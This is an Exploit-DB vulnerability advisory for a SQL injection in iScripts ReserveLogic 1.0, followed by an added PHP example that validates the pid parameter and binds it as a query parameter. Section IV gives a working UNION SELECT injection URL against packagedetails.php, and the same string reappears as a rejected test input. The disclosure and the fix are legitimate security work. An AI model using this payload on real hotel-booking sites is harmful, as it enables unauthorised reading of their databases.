iScripts ReserveLogic 1.0 – SQL Injection

  • Author: Salvatore Fresta
    Date: 2010-07-01
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/14163/
  • iScripts ReserveLogic 1.0 SQL Injection Vulnerability
    
     Name              iScripts ReserveLogic
     Vendor            http://www.iscripts.com
     Versions Affected 1.0
    
     Author            Salvatore Fresta aka Drosophila
     Website           http://www.salvatorefresta.net
     Contact           salvatorefresta [at] gmail [dot] com
     Date              2010-01-07
    
    X. INDEX
    
     I.   ABOUT THE APPLICATION
     II.  DESCRIPTION
     III. ANALYSIS
     IV.  SAMPLE CODE
     V.   FIX
     
    
    I. ABOUT THE APPLICATION
    
    iScripts ReserveLogic allows independent hotel/motels,
    B&B, time-shares, campgrounds, tour companies, etc., to
    take their business truly online with online reservation
    and customer management.
    
    
    II. DESCRIPTION
    
    A numeric field is not properly sanitised before being
    used in a SQL query.
    
    
    III. ANALYSIS
    
    Summary:
    
     A) SQL Injection
     
    
    A) SQL Injection
    
    The pid parameter in packagedetails.php is not properly
    sanitised before being used in a SQL query. Successful
    exploitation requires that the pid value exists in the
    database, that is, that it is a real package id.
    
    
    IV. SAMPLE CODE
    
    A) SQL Injection
    
    http://site/path/packagedetails.php?pid=1 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12%23
    
    
    V. FIX
    
    No Fix.
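
Added example, not part of the original advisory and not the vendor's code: one way to handle the numeric pid parameter from section III so that it is validated as an integer and bound as a query parameter instead of being placed in the SQL text. The function names (parse_pid, find_package), the packages table with its id and title columns, and the in-memory SQLite database standing in for the application's database are all assumptions made for illustration.

```php
<?php
// Added illustration: table, column and function names are hypothetical,
// not taken from iScripts ReserveLogic.

// Accept pid only if it is a short, plain run of decimal digits.
// Arrays (pid[]=1), signs, spaces and any SQL text are rejected.
function parse_pid($raw): ?int
{
    if (!is_string($raw) || $raw === '' || strlen($raw) > 9 || !ctype_digit($raw)) {
        return null;
    }
    return (int) $raw;
}

// Look up one package with the id bound as an integer parameter, so the
// value never becomes part of the SQL statement text.
function find_package(PDO $db, int $pid): ?array
{
    $stmt = $db->prepare('SELECT id, title FROM packages WHERE id = :pid');
    $stmt->bindValue(':pid', $pid, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Constructed sample data in an in-memory SQLite database.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE packages (id INTEGER PRIMARY KEY, title TEXT)');
$db->exec("INSERT INTO packages (id, title) VALUES (1, 'Weekend package')");

// Constructed inputs as PHP would see them after URL decoding: a valid id,
// the value from the request in section IV, a signed number, and an array.
$samples = ['1', '1 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12#', '-1', ['1']];
foreach ($samples as $raw) {
    $pid = parse_pid($raw);
    if ($pid === null) {
        // A real handler would answer 400 and log the request here.
        echo 'rejected: ', json_encode($raw), "\n";
        continue;
    }
    $row = find_package($db, $pid);
    echo "pid $pid: ", $row === null ? 'not found' : $row['title'], "\n";
}
```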